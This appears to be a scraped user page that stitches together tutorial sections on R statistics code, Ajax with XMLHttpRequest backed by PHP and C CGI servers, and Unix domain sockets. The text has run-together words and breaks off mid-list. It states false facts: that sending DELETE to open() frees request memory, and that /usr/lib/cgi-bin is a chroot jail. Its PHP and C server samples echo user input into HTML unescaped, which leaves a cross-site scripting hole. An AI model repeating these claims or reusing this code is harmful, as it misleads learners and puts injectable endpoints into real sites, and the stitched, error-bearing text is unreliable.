Contributing editor, database programmer, and musician
| ||||
| ||||
| ||||
| ||||
| ||||
| ||||
| ||||
| ||||
|
R is aprogramming language forstatistical computing,data visualization, anddata analysis.
Anumericdata set may have acentral tendency — where some of the most typicaldata points reside.[1] Thearithmetic mean (average) is the most commonly used measure of central tendency.[1] Themean of a numeric data set is the sum of the data points divided by the number of data points.[1]
Suppose a sample of fourobservations ofCelsius temperaturemeasurements were taken 12 hours apart.
ThisRcomputer program will output the mean of:
# The c() function "combines" a list into a single object.x<-c(30,27,31,28)sum<-sum(x)length<-length(x)mean<-sum/lengthmessage("Mean:")print(mean)
Note:R can have the sameidentifier represent both a function name and its result. For more information, visitscope.
Output:
Mean:[1] 29
ThisR program will execute the nativemean()function to output the mean ofx:
x<-c(30,27,31,28)message("Mean:")print(mean(x))
Output:
Mean:[1] 29
Astandard deviation of a numeric data set is an indication of the average distance all the data points are from the mean.[2] For a data set with a small amount of variation, then each data point will be close to the mean, so thestandard deviation will be small.[2]
Suppose a sample of four observations of Celsius temperature measurements were taken 12 hours apart.
ThisR program will output thestandard deviation of:
x<-c(30,27,31,28)distanceFromMean<-x-mean(x)distanceFromMeanSquared<-distanceFromMean**2distanceFromMeanSquaredSum<-sum(distanceFromMeanSquared)variance<-distanceFromMeanSquaredSum/(length(x)-1)standardDeviation<-sqrt(variance)message("Standard deviation:")print(standardDeviation)
Output:
Standard deviation:[1] 1.825742
ThisR program will execute the nativesd() function to output thestandard deviation of:
x<-c(30,27,31,28)message("Standard deviation:")print(sd(x))
Output:
Standard deviation:[1] 1.825742

Aphenomenon may be the result of one or moreobservableevents. For example, the phenomenon of skiing accidents may be the result of having snow in the mountains. A method to measure whether or not a numeric data set is related to another data set islinear regression.[4]
If alinear relationship exists, then ascatter plot of the two data sets will show a pattern that resembles a straight line.[5] If a straight line is embedded into the scatter plot such that the average distance from all the points to the line is minimal, then the line is called aregression line. The equation of theregression line is called theregression equation.[6]
Theregression equation is alinear equation; therefore, it has aslope andy-intercept. The format of theregression equation is.[7][a]
Suppose a sample of four observations of Celsius temperature measurements were taken 12 hours apart. At the same time, the thermometer was switched toFahrenheit temperature and another measurement was taken.
ThisR program will output theslope andy-intercept of a linear relationship in which depends upon:
x<-c(30,27,31,28)y<-c(86.0,80.6,87.8,82.4)# Build the numeratorindependentDistanceFromMean<-x-mean(x)sampledDependentDistanceFromMean<-y-mean(y)independentDistanceTimesSampledDistance<-independentDistanceFromMean*sampledDependentDistanceFromMeanindependentDistanceTimesSampledDistanceSum<-sum(independentDistanceTimesSampledDistance)# Build the denominatorindependentDistanceFromMeanSquared<-independentDistanceFromMean**2independentDistanceFromMeanSquaredSum<-sum(independentDistanceFromMeanSquared)# Slope is rise over runslope<-independentDistanceTimesSampledDistanceSum/independentDistanceFromMeanSquaredSumyIntercept<-mean(y)-slope*(mean(x))message("Slope:")print(slope)message("Y-intercept:")print(yIntercept)
Output:
Slope:[1] 1.8Y-intercept:[1] 32
ThisR program will execute the native functions to output theslope andy-intercept:
x<-c(30,27,31,28)y<-c(86.0,80.6,87.8,82.4)# Execute lm() with Fahrenheit depends upon CelsiuslinearModel<-lm(y~x)# coefficients() returns a structure containing the slope and y interceptcoefficients<-coefficients(linearModel)# Extract the slope from the structureslope<-coefficients[["x"]]# Extract the y intercept from the structureyIntercept<-coefficients[["(Intercept)"]]message("Slope:")print(slope)message("Y-intercept:")print(yIntercept)
Output:
Slope:[1] 1.8Y-intercept:[1] 32
Thecoefficient of determination determines the percentage of variation explained by the independent variable.[8] It always lies between 0 and 1.[9] A value of 0 indicates no relationship between the two data sets, and a value near 1 indicates theregression equation is extremely useful for making predictions.[10]
ThisR program will output thecoefficient of determination of the linear relationship between and:
x<-c(30,27,31,28)y<-c(86.0,80.6,87.8,82.4)# Build the numeratorlinearModel<-lm(y~x)coefficients<-coefficients(linearModel)slope<-coefficients[["x"]]yIntercept<-coefficients[["(Intercept)"]]predictedResponse<-yIntercept+(slope*x)predictedResponseDistanceFromMean<-predictedResponse-mean(y)predictedResponseDistanceFromMeanSquared<-predictedResponseDistanceFromMean**2predictedResponseDistanceFromMeanSquaredSum<-sum(predictedResponseDistanceFromMeanSquared)# Build the denominatorsampledResponseDistanceFromMean<-y-mean(y)sampledResponseDistanceFromMeanSquared<-sampledResponseDistanceFromMean**2sampledResponseDistanceFromMeanSquaredSum<-sum(sampledResponseDistanceFromMeanSquared)coefficientOfDetermination<-predictedResponseDistanceFromMeanSquaredSum/sampledResponseDistanceFromMeanSquaredSummessage("Coefficient of determination:")print(coefficientOfDetermination)
Output:
Coefficient of determination:[1] 1
ThisR program will execute the native functions to output thecoefficient of determination:
x<-c(30,27,31,28)y<-c(86.0,80.6,87.8,82.4)linearModel<-lm(y~x)summary<-summary(linearModel)coefficientOfDetermination<-summary[["r.squared"]]message("Coefficient of determination:")print(coefficientOfDetermination)
Output:[b]
Coefficient of determination:[1] 1
ThisR program will display ascatter plot with an embeddedregression line andregression equation illustrating the relationship between and:
x<-c(30,27,31,28)y<-c(86.0,80.6,87.8,82.4)linearModel<-lm(y~x)coefficients<-coefficients(linearModel)slope<-coefficients[["x"]]intercept<-coefficients[["(Intercept)"]]# Execute paste() to build the regression equation stringregressionEquation<-paste("y =",intercept,"+",slope,"x")# Display a scatter plot with the regression line and equation embeddedplot(x,y,main="Fahrenheit Depends Upon Celsius",sub=regressionEquation,xlab="Degress Celsius",ylab="Degress Fahrenheit",abline(linearModel))
Output:

R is aninterpreted language, soprogrammers typically access it through acommand-line interpreter. If a programmer types1+1 at theR command prompt and presses enter, the computer replies with2.[11] Programmers also saveRprograms to afile thenexecute thebatch interpreterRscript.[12]
R stores data inside anobject. An object is assigned aname which thecomputer program uses to set and retrieve avalue.[13] An object iscreated by placing its name to the left of thesymbol-pair<-.[14] The symbol-pair<- is called theassignment operator.[15]
To create an object namedx and assign it theinteger value82:
x<-82Lprint(x)
Output:
[1] 82The[1] displayed before the number is asubscript. It shows the container for this integer is index one of anarray.
The most primitiveR object is thevector.[16] Avector is a one dimensionalarray of data. To assign multiple elements to the array, use thec() function to "combine" the elements. The elements must be the samedata type.[17]R lacksscalar data types, which are placeholders for a singleword — usually an integer. Instead, a single integer is stored into the first element of an array. The single integer is retrieved using theindex subscript of[1].[c]
R program to store and retrieve a single integer:
store<-82Lretrieve<-store[1]print(retrieve[1])
Output:
[1] 82When anoperation is applied to a vector,R will apply the operation to each element in the array. This is called anelement-wise operation.[18]
This example creates the object namedx and assigns it integers 1 through 3. The object is displayed and then again with one added to each element:
x<-1:3print(x)print(x+1)
Output:
[1] 1 2 3[1] 2 3 4
To achieve the many additions,R implementsvector recycling.[18] Thenumeral one following theplus sign (+) is converted into an internal array of three ones. The+ operation simultaneously loops through both arrays and performs the addition on each element pair. The results are stored into another internal array of three elements which is returned to theprint() function.
Anumeric vector is used to storeintegers andfloating point numbers.[19] The primary characteristic of anumeric vector is the ability to perform arithmetic on the elements.[19]
By default, integers (numbers without a decimal point) are stored as floating point. To force integer memory allocation, append anL to the number. As an exception, the sequence operator: will, by default, allocate integer memory.
R program:
x<-82Lprint(x[1])message("Data type:")typeof(x)
Output:
[1] 82Data type:[1] "integer"
R program:
x<-c(1L,2L,3L)print(x)message("Data type:")typeof(x)
Output:
[1] 1 2 3Data type:[1] "integer"
R program:
x<-1:3print(x)message("Data type:")typeof(x)
Output:
[1] 1 2 3Data type:[1] "integer"
Adouble vector storesreal numbers, which are also known asfloating point numbers. The memory allocation for a floating point number isdouble precision.[19] Double precision is the default memory allocation for numbers with or without a decimal point.
R program:
x<-82print(x[1])message("Data type:")typeof(x)
Output:
[1] 82Data type:[1] "double"
R program:
x<-c(1,2,3)print(x)message("Data type:")typeof(x)
Output:
[1] 1 2 3Data type:[1] "double"
Alogical vector storesbinary data — eitherTRUE orFALSE. The purpose of this vector is to store the result of a comparison.[20] A logical datum is expressed as eitherTRUE,T,FALSE, orF.[20] The capital letters are required, and no quotes surround theconstants.[20]
R program:
x<-3<4print(x[1])message("Data type:")typeof(x)
Output:
[1] TRUEData type:[1] "logical"
Two vectors may be compared using the followinglogical operators:[21]
| Operator | Syntax | Tests |
|---|---|---|
| > | a > b | Is a greater than b? |
| >= | a >= b | Is a greater than or equal to b? |
| < | a < b | Is a less than b? |
| <= | a <= b | Is a less than or equal to b? |
| == | a == b | Is a equal to b? |
| != | a != b | Is a not equal to b? |
Acharacter vector storescharacter strings.[22] Strings are created by surrounding text in double quotation marks.[22]
R program:
x<-"hello world"print(x[1])message("Data type:")typeof(x)
Output:
[1] "hello world"Data type:[1] "character"
R program:
x<-c("hello","world")print(x)message("Data type:")typeof(x)
Output:
[1] "hello" "world"Data type:[1] "character"
AFactor is a vector that stores acategorical variable.[23] Thefactor() function converts atext string into anenumerated type, which is stored as aninteger.[24]
Inexperimental design, afactor is anindependent variable to test (an input) in acontrolled experiment.[25] A controlled experiment is used to establishcausation, not justassociation.[26] For example, one could notice that an increase in hot chocolate sales is associated with an increase in skiing accidents.
Anexperimental unit is an item that an experiment is being performed upon. If theexperimental unit is a person, then it is known as asubject. Aresponse variable (also known as adependent variable) is a possible outcome from an experiment. Afactor level is a characteristic of a factor. Atreatment is an environment consisting of a combination of one level (characteristic) from each of the input factors. Areplicate is the execution of atreatment on anexperimental unit and yieldsresponse variables.[27]
This example builds twoR programs to model an experiment to increase the growth of a species ofcactus. Twofactors are tested:
R program to setup the design:
# Step 1 is to establish the levels of a factor.# Vector of the water levels:waterLevel<-c("none","light","medium")# Step 2 is to create the factor.# Vector of the water factor:waterFactor<-factor(# Although a subset is possible, use all of the levels.waterLevel,levels=waterLevel)# Vector of the polymer levels:polymerLevel<-c("notUsed","used")# Vector of the polymer factor:polymerFactor<-factor(polymerLevel,levels=polymerLevel)# The treatments are the Cartesian product of both factors.treatmentCartesianProduct<-expand.grid(waterFactor,polymerFactor)message("Water factor:")print(waterFactor)message("\nPolymer factor:")print(polymerFactor)message("\nTreatment Cartesian product:")print(treatmentCartesianProduct)
Output:
Water factor:[1] none light mediumLevels: none light mediumPolymer factor:[1] notUsed usedLevels: notUsed usedTreatment Cartesian product: Var1 Var21 none notUsed2 light notUsed3 medium notUsed4 none used5 light used6 medium used
R program to store and display the results:
experimentalUnit<-c("cactus1","cactus2","cactus3")replicateWater<-c("none","light","medium")replicatePolymer<-c("notUsed","used","notUsed")replicateInches<-c(82L,83L,84L)response<-data.frame(experimentalUnit,replicateWater,replicatePolymer,replicateInches)print(response)
Output:
experimentalUnit replicateWater replicatePolymer replicateInches1 cactus1 none notUsed 822 cactus2 light used 833 cactus3 medium notUsed 84
Adata frame stores a two-dimensional array.[28] The horizontal dimension is a list of vectors. The vertical dimension is a list of rows. It is the most useful structure fordata analysis.[29]Data frames are created using thedata.frame() function. The input is a list of vectors (of any data type). Each vector becomes a column in atable. The elements in each vector are aligned to form the rows in the table.
R program:
integer<-c(82L,83L)string<-c("hello","world")data.frame<-data.frame(integer,string)print(data.frame)message("Data type:")class(data.frame)
Output:
integer string1 82 hello2 83 worldData type:[1] "data.frame"
Data frames can be deconstructed by providing a vector's name between double brackets. This returns the original vector. Each element in the returned vector can be accessed by its index number.
R program to extract the word "world". It is stored in the second element of the "string" vector:
integer<-c(82L,83L)string<-c("hello","world")data.frame<-data.frame(integer,string)vector<-data.frame[["string"]]print(vector[2])message("Data type:")typeof(vector)
Output:
[1] "world"Data type:[1] "character"
Vectorized coding is a method to produce qualityRcomputer programs that take advantage ofR's strengths.[30] TheR language is designed to be fast atlogical testing,subsetting, andelement-wise execution.[30] On the other hand,R does not have a fastfor loop.[31] For example,R cansearch-and-replace faster usinglogical vectors than by using afor loop.[31]
Afor loop repeats ablock of code for a specific number ofiterations.[32]
Example to search-and-replace using afor loop:
vector<-c("one","two","three")for(iin1:length(vector)){if(vector[i]=="one"){vector[i]<-"1"}}message("Replaced vector:")print(vector)
Output:
Replaced vector:[1] "1" "two" "three"
R'ssyntax allows for alogical vector to be used as anindex to a vector.[33] This method is calledsubsetting.[34]
R example:
vector<-c("one","two","three")print(vector[c(TRUE,FALSE,TRUE)])
Output:
[1] "one" "three"R allows for the assignment operator<- to overwrite an existing value in a vector by using an index number.[15]
R example:
vector<-c("one","two","three")vector[1]<-"1"print(vector)
Output:
[1] "1" "two" "three"R also allows for the assignment operator<- to overwrite an existing value in a vector by using alogical vector.
R example:
vector<-c("one","two","three")vector[c(TRUE,FALSE,FALSE)]<-"1"print(vector)
Output:
[1] "1" "two" "three"Because alogical vector may be used as an index, and because thelogical operator returns a vector, a search-and-replace can take place without afor loop.
R example:
vector<-c("one","two","three")vector[vector=="one"]<-"1"print(vector)
Output:
[1] "1" "two" "three"Afunction is an object that storescomputer code instead ofdata.[35] The purpose of storing code inside a function is to be able to reuse it in another context.[35]
R comes with over 1,000 native functions to perform common tasks.[36] To execute a function:
()This example rolls adie one time. The native function's name issample(). The data to be processed are:
size parameter instructssample() to execute the roll one timesample(1:6,size=1)
Possible output:
[1] 6TheRinterpreter provides a help screen for each native function. The help screen is displayed after typing in a question mark followed by the function's name:
?sample
Partial output:
Description: ‘sample’ takes a sample of the specified size from the elements of ‘x’ using either with or without replacement.Usage: sample(x, size, replace = FALSE, prob = NULL)
Thesample() function has available fourinput parameters.Input parameters are pieces of information that control the function's behavior.Input parameters may be communicated to the function in a combination of three ways:
For example, each of these calls tosample() will roll a die one time:
sample(1:6,1,F,NULL)sample(1:6,1)sample(1:6,size=1)sample(size=1,x=1:6)
Everyinput parameter has a name.[37] If a function has many parameters, settingname = data will make thesource code more readable.[38] If the parameter's name is omitted,R will match the data in the position order.[38] Usually, parameters that are rarely used will have adefault value and may be omitted.
The output from a function may become the input to another function. This is the basis fordata coupling.[39]
This example executes the functionsample() and sends the result to the functionsum(). It simulates the roll of two dice and adds them up.
sum(sample(1:6,size=2,replace=TRUE))
Possible output:
[1] 7A function has parameters typically to input data. Alternatively, a function (A) can use a parameter to input another function (B). Function (A) will assume responsibility to execute function (B).
For example, the functionreplicate() has an input parameter that is a placeholder for another function. This example will executereplicate() once, andreplicate() will executesample() five times. It will simulate rolling a die five times:
replicate(5,sample(1:6,size=1))
Possible output:
[1] 2 4 1 4 5Because each face of a die is equally likely to appear on top, rolling a die many times generates theuniform distribution.[40] This example displays ahistogram of a die rolled 10,000 times:
hist(replicate(10000,sample(1:6,size=1)))
The output is likely to have a flat top:

Whereas anumericdata set may have acentral tendency, it also may not have a central tendency. Nonetheless, a data set of thearithmetic mean of manysamples will have a central tendency toconverge to the population's mean. The arithmetic mean of a sample is called thesample mean.[41] Thecentral limit theorem states for a sample size of 30 or more, thedistribution of thesample mean () is approximatelynormally distributed, regardless of the distribution of the variable under consideration ().[42] Ahistogram displaying a frequency of data point averages will show the distribution of thesample mean resembles abell-shaped curve.
For example, rolling one die many times generates theuniform distribution. Nonetheless, rolling 30 dice and calculating each average () over and over again generates a normal distribution.
R program to roll 30 dice 10,000 times and plot the frequency of averages:
hist(replicate(10000,mean(sample(1:6,size=30,replace=T))))
The output is likely to have a bell shape:

To create a function object, execute thefunction()statement and assign the result to a name.[43] A function receives input both fromglobal variables andinput parameters (often called arguments). Objects created within the function body remainlocal to the function.
R program to create a function:
# The input parameters are x and y.# The return value is a numeric double vector.f<-function(x,y){first_expression<-x*2second_expression<-y*3first_expression+second_expression# The return statement may be omitted# if the last expression is unassigned.# This will save a few clock cycles.}
Usage output:
>f(1,2)[1] 8
Function arguments are passed in byvalue.
R supportsgeneric functions, which is also known aspolymorphism. Generic functions act differently depending on theclass of the argument passed in. The process is todispatch themethod specific to the class. A common implementation isR'sprint() function. It can print almost every class of object. For example,print(objectName).[44]
R program illustratingif statements:
minimum<-function(a,b){if(a<b)minimum<-aelseminimum<-breturn(minimum)}maximum<-function(a,b){if(a>b)maximum<-aelsemaximum<-breturn(maximum)}range<-function(a,b,c){range<-maximum(a,maximum(b,c))-minimum(a,minimum(b,c))return(range)}range(10,4,7)
Output:
[1] 6R provides three notable shortcuts available to programmers.
If anobject is present on a line by itself, then the interpreter will send the object to theprint() function.[45]
R example:
integer<-82Linteger
Output:
[1] 82If aprogrammer-created function omits thereturn()statement, then the interpreter will return the last unassignedexpression.[46]
R example:
f<-function(){# Don't assign the expression to an object.82L+1L}
Usage output:
>f()[1] 83
Thesymbol-pair<-assigns avalue to anobject.[15] Alternatively,= may be used as the assignment operator. However, care must be taken because= closely resembles thelogical operator for equality, which is==.[47]
R example:
integer=82Lprint(integer)
Output:
[1] 82If anumericdata set has acentral tendency, it also may have asymmetric lookinghistogram — a shape that resembles a bell. If a data set has an approximately bell-shaped histogram, it is said to have anormal distribution.[48]
In 1817, aScottisharmy contractor measured the chest sizes of 5,732 members of amilitia unit. The frequency of each size was:[49]
| Chest size (inches) | Frequency |
|---|---|
| 33 | 3 |
| 34 | 19 |
| 35 | 81 |
| 36 | 189 |
| 37 | 409 |
| 38 | 753 |
| 39 | 1062 |
| 40 | 1082 |
| 41 | 935 |
| 42 | 646 |
| 43 | 313 |
| 44 | 168 |
| 45 | 50 |
| 46 | 18 |
| 47 | 3 |
| 48 | 1 |
R has thewrite.csv()function to convert adata frame into aCSV file.
R program to create chestsize.csv:
chestsize<-c(33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48)frequency<-c(3,19,81,189,409,753,1062,1082,935,646,313,168,50,18,3,1)dataFrame<-data.frame(chestsize,frequency)write.csv(dataFrame,file="chestsize.csv",# By default, write.csv() creates the first column as the row number.row.names=FALSE)
The first step indata science is toimport a data set.[50]
R program to import chestsize.csv into a data frame:
dataFrame<-read.csv("chestsize.csv")print(dataFrame)
Output:
chestsize frequency1 33 32 34 193 35 814 36 1895 37 4096 38 7537 39 10628 40 10829 41 93510 42 64611 43 31312 44 16813 45 5014 46 1815 47 316 48 1
The second step indata science is totransform the data into a format that the functions expect.[50] The chest-size data set issummarized to frequency; however,R'snormal distribution functions require anumeric double vector.
R function to convert a summarized to frequencydata frame into a vector:
# Filename: frequencyDataFrameToVector.RfrequencyDataFrameToVector<-function(dataFrame,dataColumnName,frequencyColumnName="frequency"){dataVector<-dataFrame[[dataColumnName]]frequencyVector<-dataFrame[[frequencyColumnName]]vectorIndex<-1frequencyIndex<-1vector<-NAfor(datumindataVector){frequency<-frequencyVector[frequencyIndex]for(iin1:frequency){vector[vectorIndex]<-datumvectorIndex<-vectorIndex+1}frequencyIndex<-frequencyIndex+1}return(vector)}
R has thesource() function toinclude anotherRsource file into the current program.
R program to load and display a summary of the 5,732 member data set:
source("frequencyDataFrameToVector.R")dataFrame<-read.csv("chestsize.csv")chestSizeVector<-frequencyDataFrameToVector(dataFrame,"chestsize")message("Head:")head(chestSizeVector)message("\nTail:")tail(chestSizeVector)message("\nCount:")length(chestSizeVector)message("\nMean:")mean(chestSizeVector)message("\nStandard deviation:")sd(chestSizeVector)
Output:
Head:[1] 33 33 33 34 34 34Tail:[1] 46 46 47 47 47 48Count:[1] 5732Mean:[1] 39.84892Standard deviation:[1] 2.073386
The third step indata science is tovisualize the data set.[50] If ahistogram of a data set resembles a bell shape, then it isnormally distributed.[48]
R program to display ahistogram of the data set:
source("frequencyDataFrameToVector.R")dataFrame<-read.csv("chestsize.csv")chestSizeVector<-frequencyDataFrameToVector(dataFrame,"chestsize")hist(chestSizeVector)
Output:

Anyvariable () in a data set can be converted into astandardized variable (). Thestandardized variable is also known as a z-score.[51] To calculate the z-score, subtract themean and divide by thestandard deviation.[52]
R function to convert a measurement to a z-score:
# Filename: zScore.RzScore<-function(measurement,mean,standardDeviation){(measurement-mean)/standardDeviation}
R program to convert a chest size measurement of 38 to a z-score:
source("zScore.R")print(zScore(38,39.84892,2.073386))
Output:
[1] -0.8917394R program to convert a chest size measurement of 42 to a z-score:
source("zScore.R")print(zScore(42,39.84892,2.073386))
Output:
[1] 1.037472Astandardized data set is a data set in which each member of an input data set was run through thezScore function.
R function to convert anumeric vector into a z-score vector:
# Filename: zScoreVector.Rsource("zScore.R")zScoreVector<-function(vector){zScoreVector=NAfor(iin1:length(vector)){zScoreVector[i]<-zScore(vector[i],mean(vector),sd(vector))}return(zScoreVector)}
R program to standardize the chest size data set:
source("frequencyDataFrameToVector.R")source("zScoreVector.R")dataFrame<-read.csv("chestsize.csv")chestSizeVector<-frequencyDataFrameToVector(dataFrame,dataColumnName="chestsize")zScoreVector<-zScoreVector(chestSizeVector)message("Head:")head(zScoreVector)message("\nTail:")tail(zScoreVector)message("\nCount:")length(zScoreVector)message("\nMean:")round(mean(zScoreVector))message("\nStandard deviation:")sd(zScoreVector)hist(zScoreVector)
Output:
Head:[1]-3.303253-3.303253-3.303253-2.820950-2.820950-2.820950Tail:[1]2.9666842.9666843.4489873.4489873.4489873.931290Count:[1]5732Mean:[1]0Standarddeviation:[1]1


Ahistogram of anormally distributed data set that is converted to itsstandardized data set also resembles a bell-shaped curve. The curve is called thestandard normal curve or thez-curve. The four basic properties of thez-curve are:[53]
The probability that a future measurement will be a value between a designated range is equal to the area under thestandard normal curve of the designated range's twoz-scores.[54]
For example, suppose the Scottish militia'squartermaster wanted to stock up on uniforms. What is the probability that the next recruit will need a size between 38 and 42?
R program:
library(tigerstats)source("frequencyDataFrameToVector.R")source("zScore.R")dataFrame<-read.csv("chestsize.csv")chestSizeVector<-frequencyDataFrameToVector(dataFrame,dataColumnName="chestsize")zScore38<-zScore(38,mean(chestSizeVector),sd(chestSizeVector))zScore42<-zScore(42,mean(chestSizeVector),sd(chestSizeVector))areaLeft38<-tigerstats::pnormGC(zScore38)areaLeft42<-tigerstats::pnormGC(zScore42)areaBetween<-areaLeft42-areaLeft38message("Probability:")print(areaBetween)
Output:
Probability:[1] 0.6639757
ThepnormGC() function can compute the probability between a range without first calculating the z-score.
R program:
library(tigerstats)source("frequencyDataFrameToVector.R")dataFrame<-read.csv("chestsize.csv")chestSizeVector<-frequencyDataFrameToVector(dataFrame,dataColumnName="chestsize")areaBetween<-tigerstats::pnormGC(c(38,42),mean=mean(chestSizeVector),sd=sd(chestSizeVector),region="between",graph=TRUE)message("Probability:")print(areaBetween)
Output:
Probability:[1] 0.6639757

XMLHttpRequest is aJavaScriptclass containingmethods toasynchronouslytransmitHTTP requests from aweb browser to aweb server.[55] The methods allow a browser-based application to make a fine-grained server call and store the result in the XMLHttpRequestresponseTextattribute.[56] TheXMLHttpRequest class is a component ofAjax programming. Without Ajax, the "Submit" button will send to the server an entireHTML form. The server will respond by returning an entire HTML page to the browser.[56]
Generating an asynchronous request to theweb server requires first toinstantiate (allocate the memory of) theXMLHttpRequest object. The allocated memory is assigned to avariable. The programmingstatement in JavaScript to instantiate a new object isnew.[57] Thenew statement is followed by theconstructor function of the object. The custom forobject-oriented language developers is to invoke the constructor function using same name as theclass name.[58] In this case, the class name isXMLHttpRequest. To instantiate a newXMLHttpRequest and assign it to the variable namedrequest:
var request = new XMLHttpRequest();[59]
Theopen method prepares theXMLHttpRequest.[60] It can accept up to fiveparameters, but requires only the first two.
var request = new XMLHttpRequest();
request.open( RequestMethod, SubmitURL, AsynchronousBoolean, UserName, Password );
GET for smaller quantities of data. Among the other request methods available,POST will handle substantial quantities of data.[61] After the return string is received, then send theDELETE request method to.open() to free theXMLHttpRequest memory.[62] IfDELETE is sent, then the SubmitURL parameter may benull.request.open( "DELETE", null );If the request method ofPOST is invoked, then the additional step of sending themedia type ofContent-Type: application/x-www-form-urlencoded is required.[65] ThesetRequestHeader method allows the program to send this or otherHTTP headers to the web server. Its usage issetRequestHeader( HeaderField, HeaderValue ).[60] To enable thePOST request method:
request.setRequestHeader( "Content-Type", "application/x-www-form-urlencoded" );If the request method ofPOST is invoked, then the web server expects theform data to be read from the standard input stream.[66] To send theform data to the web server, executerequest.send( FormData ), where FormData is a text string. If the request method ofGET is invoked, then the web server expects only the default headers.[67] To send the default headers, executerequest.send( null ).[d]
onreadystatechange is acallback method that is periodically executed throughout the Ajax lifecycle.[68] To set a callback method namedlistenMethod(), thesyntax isrequest.onreadystatechange = listenMethod.[e] For convenience, the syntax allows for ananonymous method to be defined.[68] To define an anonymous callback method:
varrequest=newXMLHttpRequest();request.onreadystatechange=function(){// code omitted}
TheXMLHttpRequest lifecycle progresses through several stages – from 0 to 4. Stage 0 is before theopen() method is invoked, and stage 4 is when the text string has arrived.[67] To monitor the lifecycle,XMLHttpRequest has available thereadyStateattribute. Stages 1-3 are ambiguous and interpretations vary across browsers.[60] Nonetheless, one interpretation is:[60]
WhenreadyState reaches 4, then the text string has arrived and is set in theresponseText attribute.
varrequest=newXMLHttpRequest();request.onreadystatechange=function(){if(request.readyState==4){// request.responseText is set}}
Upon request, the browser will execute a JavaScript function to transmit a request for theweb server to execute acomputer program. The computer program may be thePHPinterpreter, another interpreter, or acompiledexecutable. In any case, the JavaScript function expects atext string to be transmitted back and stored in theresponseTextattribute.[67]
To create an example JavaScript function:
cd /var/www/htmlajax_submit.js:functionajax_submit(destination_division,submit_url,person_name){varrequest=newXMLHttpRequest();varcompleted_state=4;submit_url=submit_url+"?person_name="+person_name;request.open("GET",submit_url,true);request.send(null);request.onreadystatechange=function(){if(request.readyState==completed_state){document.getElementById(destination_division).innerHTML=request.responseText;request.open("DELETE",null);}}}
PHP is ascripting language designed specifically tointerface withHTML.[69] Because the PHP engine is aninterpreter – interpreting programstatements as they are read – there are programming limitations[f] and performance costs.[g] Nonetheless, its simplicity may place theXMLHttpRequest set of files in the same working directory – probably/var/www/html.
Theserver component of a PHPXMLHttpRequest is a file located on the server that does not get transmitted to the browser. Instead, the PHP interpreter will open this file and read in its PHP instructions. TheXMLHttpRequest protocol requires an instruction to output a text string.
cd /var/www/htmlajax_server.php:<?php$person_name=$_GET['person_name'];echo"<p>Hello$person_name";?>
Thebrowser component of a PHPXMLHttpRequest is a file that gets transmitted to the browser. The browser will open this file and read in its HTML instructions.
cd /var/www/htmlajax_php.html:<!doctype html><html><head><title>Hello World</title><scripttype=text/javascriptsrc=ajax_submit.js></script></head><body><p>What is your name?<inputtype=textid="person_name"size=10><divid=destination_division></div><buttononclick="ajax_submit( 'destination_division', 'ajax_server.php', document.getElementById( 'person_name' ).value )"> Submit</button></body></html>
http://localhost/ajax_php.htmlSubmitTheCommon Gateway Interface (CGI) process allows a browser to request theweb server to execute acompiledcomputer program.[h]
Theserver component of a CGIXMLHttpRequest is anexecutable file located on the server. Theoperating system will open this file and read in itsmachine instructions. TheXMLHttpRequest protocol requires an instruction to output a text string.
Compiled programs have two files: thesource code and a corresponding executable.
cd /usr/lib/cgi-binajax_server.c:#include<stdio.h>#include<stdlib.h>#include<string.h>voidmain(void){char*query_string;char*person_name;query_string=getenv("QUERY_STRING");/* Skip "person_name=" */person_name=query_string+strlen("person_name=");/* CGI requires the first line to output: */printf("Content-type: text/html\n");/* CGI requires the second line to output: */printf("\n");printf("<p>Hello %s\n",person_name);}
cc ajax_server.c -o ajax_server
The CGI browser component is the same as the PHP browser component, except for a slight change in thesubmit_url. Thesyntax to tell the web server to execute an executable is/cgi-bin/ followed by the filename. For security, the executable must reside in achroot jail. In this case, the jail is the directory/usr/lib/cgi-bin/.[i]
cd /var/www/htmlajax_cgi.html:<!doctype html><html><head><title>Hello World</title><scripttype=text/javascriptsrc=ajax_submit.js></script></head><body><p>What is your name?<inputtype=textid="person_name"size=10><divid=destination_division></div><buttononclick="ajax_submit( 'destination_division', '/cgi-bin/ajax_server', document.getElementById( 'person_name' ).value )"> Submit</button></body></html>
http://localhost/ajax_cgi.htmlSubmitInclient-server computing, aUnix domain socket is aBerkeley socket that allows data to be exchanged between twoprocessesexecuting on the sameUnix orUnix-like host computer.[71] This is similar to anInternet domain socket that allows data to be exchanged between two processes executing on different host computers.
Regardless of therange of communication (same host or different host),[72] Unixcomputer programs that performsocketcommunication are similar. The onlyrange of communication difference is the method to convert a name to the address parameter needed tobind the socket's connection. For aUnix domain socket, the name is a/path/filename. For anInternet domain socket, the name is anIP address:Port number. In either case, the name is called anaddress.[73]
Two processes may communicate with each other if each obtains a socket. The server processbinds its socket to anaddress, opens alisten channel, and then continuouslyloops. Inside the loop, the server process is put to sleep while waiting toaccept a client connection.[74] Uponaccepting a client connection, the server then executes areadsystem call that willblock wait. The clientconnects to the server's socket via the server'saddress. The client process thenwrites amessage for the server process to read. The application'salgorithm may entail multiple read/write interactions. Upon completion of the algorithm, the client executesexit()[75] and the server executesclose().[76]
For aUnix domain socket, the socket's address is a/path/filename identifier. The server will create/path/filename on thefilesystem to act as alock filesemaphore. No I/O occurs on this file when the client and server send messages to each other.[77]
Sockets first appeared inBerkeley Software Distribution 4.2 (1983).[78] It became aPOSIX standard in 2000.[78] Theapplication programming interface has been ported to virtually every Unix implementation and most other operating systems.[78]
Both the server and the client mustinstantiate asocket object by executing thesocket()system call. Its usage is[79]
intsocket(intdomain,inttype,intprotocol);
Thedomain parameter should be one of the following commonranges of communication:[80]
AF_UNIX[j]AF_INETAF_INET6TheUnix domain socket label is used when thedomain parameter's value isAF_UNIX. TheInternet domain socket label is used when thedomain parameter's value is eitherAF_INET orAF_INET6.[82]
Thetype parameter should be one of following common socket types:[80]
